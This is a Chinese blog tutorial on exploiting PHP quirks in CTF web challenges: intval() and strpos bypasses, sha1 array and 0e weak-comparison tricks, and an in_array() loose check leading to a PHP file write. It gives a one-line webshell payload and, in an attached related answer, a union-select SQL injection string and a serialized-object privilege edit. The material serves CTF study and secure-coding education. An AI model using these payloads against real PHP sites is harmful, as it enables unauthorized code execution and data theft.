CTF中的PHP特性函数(中)

最新推荐文章于 2024-12-01 23:36:44 发布
最新推荐文章于 2024-12-01 23:36:44 发布
阅读量615 收藏 3
点赞数
CC 4.0 BY-SA版权
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/text202202/article/details/128543747
本文介绍了PHP中的一些特性,如intval的数字转换和字符串截取功能,如何在CTF挑战中利用这些特性绕过限制。还讨论了strpos的字符串查找、sha1的弱哈希比较以及如何利用数组进行绕过。同时,文章提到了array_push在数组操作中的应用,以及如何利用类型转换的安全漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

上篇文章给大家带来了PHP中最基本的特性,不知道大家学习的怎样了,回顾上文,我们讲了MD5强弱碰撞以及正则匹配的绕过,总体来看还是很简单的,下面给大家带来新的PHP特性讲解,会稍微比上一篇难一些。

intval()

上一篇在最后时简单介绍了一下这个函数,我们看看官方是怎样定义的:

简单来说就是让输入的数字变成整数,下面我们举个例子:

echo intval(1145.14); // 1145
echo intval('114514');// 114514

可以发现只对有小数点的数字起作用,正常的整数还是照常输出,那么它在CTF中是如何考察的呢,查看下面代码:

if($num==="1145"){die("no no no!");}if(intval($num,0)===1145){echo $flag;}

要我们强类型传入的不能等于1145,但后面经过intval函数又要等于1145,这不和前面的矛盾了,我们要怎样做呢?

这里介绍一下intval的特性,如果我们在函数里传入字符串,那么该函数就会返回不是数字的字符之前的数字,也就是说我们传入:

sum=1145a

intval就会判断我们传入的是1145,从而实现了绕过,还有另一种绕过方法:

当base为0时,intval会自动进行进制转换,我们可以传入1145的十六进制形式来绕过。

strpos()

根据手册可以看到,该函数以及与其类似的函数,作用都是匹配第一个或者最后一个字符,根据该函数特性,题目会经常围绕它作为一个限制头部的点,比如上面那题可能会增加限制:

 if(!strpos($num, "0")){die("no no no!");

因为八进制开头通常为0,检测到的话就不能通过进制转换来绕过了。

sha1

该函数的利用以及绕过方法类似于MD5函数,都是运用了PHP特性来做,这里简单看一下:

数组比较

类似于MD5,在SHA1里我们也可以使用数组绕过,具体可以看下面例子:

if(sha1($a)==sha1($b) && $a!=$b){	echo $flag;
}

可以看到,也是一个弱比较,根据PHP特性sha1函数无法对数组进行处理,,于是我们传入数组来使结果为NULL:

a[]=1
b[]=2

强类型

与MD5相同,当然也存在强类型比较,我们不能用数组来进行绕过了:

if(sha1($a)===sha1($b) && $a!=$b){	echo $flag;
}

这里同样有类似于MD5函数的解决方法:

a=aaK1STf//0e7665852665575620768827115962402601
b=aaO8zKZF //0e89257456677279068558073954252716165

array_push()

可以理解为向数组尾部插入参数,我们看看是如何考察的:

<?php
highlight_file(__FILE__);
$allow = array();
for ($i=36; $i < 0x36d; $i++) { array_push($allow, rand(1,$i));
}
if(isset($_GET['n']) && in_array($_GET['n'], $allow)){file_put_contents($_GET['n'], $_POST['content']);
}
?>

可以看到题目先向数组里插入随机数,in_array()是搜索数组中是否存在指定的值,根据它的语法:

type会判断类型是否匹配,这就是我们利用的点,因为数组里数据为int型,根据PHP特性比较后字符串会转成int型,也就是说我们传入1.php也是没有问题的,后面有个写入文件操作,正好可以设置一句话木马连接后门,或者进行命令执行:

get:n=1.php
post: content=<?=`tac f*`;

结语

今天这篇文章可能有的地方不是很好理解,但总体来说还是很简单的,PHP特性很多以至于只能挑出一些著名的来说,喜欢本文的小伙伴希望可以一键三连支持一下。

CTF中的PHP特性函数(上)
Jinmindong
01-03 675
作为PHP特性总结的第一篇,介绍了一下最简单的特性函数以及绕过方法,后面还会给大家带来更多的PHP特性知识,希望大家能喜欢。
2024年网络安全最新ctf中常见php特性_php特性 ctf
m0_54903333的博客
05-03 1053
在这个例子中,如果攻击者将恶意的PHP代码作为评论提交,如,它会被存储到数据库,并在评论显示时执行。这种远程代码执行漏洞可能导致攻击者获得应用程序的控制权,执行任意的系统命令,访问敏感数据等。24. ## 六、PHP类型强制转换:通过利用PHP的弱类型特性,攻击者可以绕过输入验证,执行非预期的操作。25. PHP类型强制转换是指通过利用PHP的弱类型特性,攻击者可以绕过输入验证,执行非预期的操作。
ctf中常见php特性
2301_79863884的博客
01-10 1468
本地文件包含: 本地文件包含漏洞是指攻击者通过应用程序中的,成功包含本地系统文件,并在其中执行恶意代码。攻击者可以利用该漏洞读取敏感文件、执行系统命令或将Web服务器配置文件修改为恶意内容。以下是一个示例上述示例中,应用程序从URL参数中获取文件名并将其包含到代码中。攻击者可以通过在URL中添加恶意文件路径来访问未经授权的文件。远程文件包含: 远程文件包含漏洞是指攻击者通过应用程序中的输入点,成功包含远程服务器上的文件,并在其中执行恶意代码。
ctfshow web入门 php特性
Sentiment的博客
04-11 5792
web89 intval() 函数用于获取变量的整数值,可preg_match过滤了数字,这里可以用数组绕过,因为preg_match无法处理数组 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if
CTF常出现的php函数简易总结
布屿
02-29 650
mb_strpos() php中可以使用strpos函数与mb_strpos函数获取指定的字符串在别一个字符串中首次出现的位置,也可以使用它们判断一串字符串中是否包含别一个字符串。 虽然它们的作用相同,但是在输出的结果上却有很大的差别,mb_strpos 按字处理,strpos 按字符处理。 strpos(string,find,start) string 必需。规定要搜索的字符串。 find...
CTF常见的PHP函数归纳 以及利用
weixin_43836806的博客
10-28 1558
CTF常见的PHP函数归纳 1 PHP的==弱等于利用: 1. bealn型true可以和任何类型的数据相等; 2 isset($_GET[‘page’]) 是表示是否有以get方式传进来的?page= 的参数 3 字符串之间的拼接是用 . 链接 如:$file = "templates/" . $page . ".php"; page是一个对...
CTF-PHP特性知识点总结
zji
07-16 973
系列文章目录 提示:来自CTFshow题目 文章目录系列文章目录来自ctfshow的所有题目总结一、intval()函数二、多行匹配3.== 弱类型与路径问题4.md5()5.三目运算符的理解+变量覆盖6. in_array()函数7.is_numeric()函数优先级 前置需要学习参考 php中=与区别 来自ctfshow的所有题目总结 一、intval()函数 例子1 例子1 if(preg_match("/[0-9]/", $num)){ die("no no no!");
CTF中常见的PHP函数漏洞
渗透、攻防、CTF、编程
07-04 2915
1.弱类型比较 2.MD5 compare漏洞 PHP在处理哈希字符串时,如果利用”!=”或”==”来对哈希值进行比较,它把每一个以”0x”开头的哈希值都解释为科学计数法0的多少次方(为0),所以如果两个不同的密码经过哈希以后,其哈希值都是以”0e”开头的,那么php将会认为他们相同。 常见的payload有 0x01 md5(str) QNKCDZO 240610708 s878926199a s155964671a s214587387a...
CTF中的PHP特性
qq_45086218的博客
02-26 5672
文章目录正则表达式元字符模式修正符preg_match()数组绕过换行绕过intval()字符绕过科学计数法进制转换小数点绕过strpos()md5强类型比较弱类型比较md5碰撞file_put_contents()in_array()优先级 本文以ctf.show网站题目为例,总结ctf中的php特性 正则表达式 元字符 模式修正符 preg_match() 数组绕过 preg_match()只能处理字符串,当传入的subject是数组时会返回false if(preg_match("/[0-9]/
ctf中怎样获取php文件源码,CTF中文件包含的一些技巧
weixin_39580682的博客
03-09 3918
前言文件包含在 CTF 比赛也是常考的一个点,这里对一些包含点的原理、特征进行一些总结,并结合实际的例子来讲解如何绕过。php伪协议的分类伪协议是文件包含的基础,理解伪协议的的原理才能更好的利用文件包含漏洞。php://inputphp://input代表可以访问请求的原始数据,简单来说POST请求的情况下,php://input可以获取到post的数据。使用条件:include()、includ...
CTFweb中的常见php函数意义与用法
qq_52907838的博客
04-05 1588
is_numeric()函数用于检测变量是否为数字或数字字符串, 如果指定的变量是数字和数字字符串则返回 TRUE,否则返回 FALSE,注意浮点型返回空值,即 FALSE var_dump()会返回数据变量的类型和值 eval()会把字符串当作php代码 看到eval(),想到可以用命令执行漏洞 strpos() 函数用于在字符串内查找一个字符或一段指定的文本,如果在字符串中找到匹配,该函数会返回第一个匹配的字符位置。如果未找到匹配,则返回 FALSE。 strlen函...
CTF常见的php函数
qq_42812036的博客
04-03 4586
4.3 str_replace(find,replace,string,count):在字符串sting中找到字符串find,并把它替换成replace; eg: str=str_replace(key,’ ',$str) 空字符串代替 str里的 key count 可选。对替换数进行计数的变量。 strstr(string,search,before_search):找到search字符...
ctfshow——PHP特性
qq_55202378的博客
01-03 1381
另外,intval()函数如果$base为0,则$var中存在字母的话遇到字母就停止读取,传入4476a会将后面的a丢弃,比较前面的.
CTF中可能遇到的php函数
qq_73611706的博客
12-01 1017
ctf中常见的PHP函数特性
CTF--PHP特性小记(见到及时记录)
weixin_53425135的博客
07-03 290
PHP弱类型总结+绕过方式 注:是搜集总结的知识点 一.两种比较符号 == 和 === == 在进行比较的时候,会先将字符串类型转化成相同类型,再进行比较。 === 在进行比较的时候,会先判断两种字符串的类型是否相等,再进行比较。 如果一个数值和字符串进行比较的时候,会将字符串转换成数值。 看几个具体的例子: 1. var_dump("admin"==0);//正确 将admin转化成数值,强制转化,由于admin是字符串,转化的结果是0和0相等 2. var_dump("admin1"==1);//错误
ctfshow---php特性
fainpo的博客
04-02 1891
使用此管道符“|”可以将两个命令分隔开,“|”左边命令的输出就会作为“|”右边命令的输入,此命令可连续使用,第一个命令的输出会作为第二个命令的输入,第二个命令的输出又会作为第三个命令的输入,依此类推。就是比如get传入a=1第一个foreach的$key就是a,$value就是1,利用die($error) 这里退出会输出$error,所以将flag的值赋值给他就能得到flag,当然第一个if不让,所以我们利用一个跳板。_()==gettext() 是gettext()的拓展函数,开启text扩展。
ctfshow-php特性
YkingH的博客
01-26 6260
Web专项练习—ctfshow-php特性 php绕过方法总结 小数绕过 进制绕过 ==、 = ==绕过 %20空格绕过 %0a换行绕过 回车\空格+八进制绕过 相对路径绕过 php伪协议读取文件 数组md5值为0 弱类型匹配 函数写???? 运算优先级漏洞 反射类绕过 call_user_func()绕过 sha1()函数绕过 变量覆盖 sha1弱比较 md5弱比较 ereg()截断漏洞 php内置类 FilesystemIterator 压缩过滤器绕过 空格代替url ‘_’ 绕过 gettex
ctf.show的PHP特性(web89-web150)
热门推荐
wanan的博客
09-03 2万+
ctf.show的PHP特性(web89-web150)
ctf中一些php特性(遇到不知道的就记录下来)
qq_44657899的博客
11-08 1798
文章目录$GLOBALSphp优先级 $GLOBALS PHP全局变量$GLOBALS引用全局作用域中可用的全部变量,用这个特性可以获得当前php页面里的变量值。 php优先级 and的优先级低于= 所以本来True and False应该是等于false的,因为优先级的关系,先把True赋值给$a,然后执行and操作。 ...
ctf中的PHP弱类型
最新发布
06-28
<think>嗯,用户想了解CTF比赛中与PHP弱类型相关的安全问题及利用方法。从对话历史看,用户之前已经了解过PHP弱类型的基本概念和隐患,现在需要更具体的CTF应用场景。用户引用了5个站内资料,其中引用[2]和[3]特别相关:引用[2]展示了PHP反序列化漏洞的实例,引用[3]则提到in_array()函数的类型转换问题。其他引用虽然涉及PHP安全,但和弱类型关联较弱。 需要重点覆盖CTF中三类典型弱类型漏洞: 1.松散比较导致的验证绕过(如md5碰撞、0e开头的哈希值比较) 2. in_array()和array_search()函数的自动类型转换问题3.反序列化中类型混淆引发的对象注入用户可能正在准备CTF比赛,需要实战案例。应该给出具体漏洞原理和payload构造方法,比如如何利用"0e123"被当作科学计数法0的特性绕过哈希验证。引用[3]提到的SQL注入案例也很典型——当in_array()遇到字符串数字时,会将其转为数字比较,导致"1 unionselect"通过检查。 考虑到CTF的解题特性,还要强调防御方法。比如严格比较运算符(===)的使用、类型声明、intval()强制转换等。可以结合引用[3]的SQL注入案例,说明如何用全等号避免漏洞。 最后需要提醒用户,CTF中这类漏洞常出现在登录验证、权限检查、反序列化入口等位置。payload构造时要特别注意PHP的类型转换规则,比如字符串转数字时截取到第一个非数字字符的特性。</think>在CTF比赛中,PHP弱类型漏洞的利用主要集中在**类型自动转换**和**松散比较**导致的逻辑绕过。以下是关键漏洞类型及利用方法: --- ### 一、哈希比较绕过(经典0e漏洞) **原理**: PHP在松散比较(`==`)时会将`0e`开头的字符串解析为科学计数法的0(即`0 × 10^n`),导致不同内容的哈希值被误判相等。 **利用场景**: - 密码哈希验证、身份令牌校验等场景使用`==`而非`===` **Payload**: ```php // 已知目标哈希值以0e开头(如md5('240610708')=0e462097431906509019562988736854) $input = "0e1137126905"; // 任意0e开头的哈希字符串 if ($input == $_POST['password_hash']) { // 松散比较 bypass_login(); } ``` --- ### 二、`in_array()`/`array_search()`类型混淆 **原理**(引用[3]): `in_array($needle, $haystack)`默认松散比较(第三个参数为`false`),字符串数字如`"1abc"`会被强制转为整数`1`。 **利用场景**: - SQL注入绕过数字白名单检查 ```php // 漏洞代码示例 $allow_types = array(1, 2, 3, 4); if (in_array($_GET['typeid'], $allow_types)) { // 未启用严格模式 $sql = "SELECT * FROM table WHERE typeid=" . $_GET['typeid']; } ``` **Payload**: ``` ?typeid=1%20union%20select%201,2,database()-- // 实际传入字符串"1 union..."被转为整数1,通过检查 ``` --- ### 三、反序列化中的类型混淆(引用[2]) **原理**: 私有属性在序列化后格式为`%00类名%00属性名`,若反序列化时未严格校验类型,可能通过修改序列化字符串注入非法值。 **利用步骤**: 1. 构造恶意序列化数据: ```php class User { private $is_admin = false; } $payload = serialize(new User()); // 输出: O:4:"User":1:{s:10:"Useris_admin";b:0;} ``` 2. 修改属性值为`true`: ```diff - s:10:"Useris_admin";b:0; + s:10:"Useris_admin";b:1; // 将false改为true ``` 3. 触发反序列化后,`$is_admin`变为`true`,获得管理员权限。 --- ### 四、数字与字符串比较漏洞 **原理**: 字符串与数字比较时,字符串会被转为数字(从首位开始到第一个非数字字符截止)。 **Payload**: ```php // 如验证码校验 if ($_POST['captcha'] == 1234) { // 松散比较 grant_access(); } // 输入"1234abcd"会被转为1234,通过验证 ``` --- ### 五、防御措施 1. **严格比较**:始终使用`===`和`!==` 2. **类型声明**:PHP 7+ 使用类型声明 ```php function check(int $typeid) {...} // 强制类型 ``` 3. **启用严格模式**: ```php declare(strict_types=1); // 文件顶部声明 ``` 4. **安全函数配置**: ```php in_array($needle, $haystack, true); // 启用严格模式 ``` 5. **输入过滤**: ```php $id = (int)$_GET['id']; // 强制类型转换 ``` --- ### 六、CTF实战技巧 1. **定位漏洞点**: - 搜索代码中的`==`、`in_array`、`array_search` - 查找未过滤的`unserialize()`输入点 2. **构造Payload**: - 哈希绕过:尝试`0e`开头的已知碰撞值(如`240610708`) - 数字混淆:在数字后拼接字符(如`123abc`) - 序列化攻击:修改私有属性类型或值 > 通过理解PHP类型转换规则(如`"abc"==0`、`"123abc"==123`),可精准构造绕过Payload[^3][^2]。 --- **相关问题**: 1. CTF中如何利用PHP弱类型绕过文件包含漏洞的过滤? 2. 在PHP反序列化漏洞中,弱类型如何影响`__wakeup()`方法的执行逻辑? 3. 如何通过弱类型特性绕过WAF的数字型SQL注入防护? 4. `switch`语句中的弱类型比较可能导致哪些安全问题?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值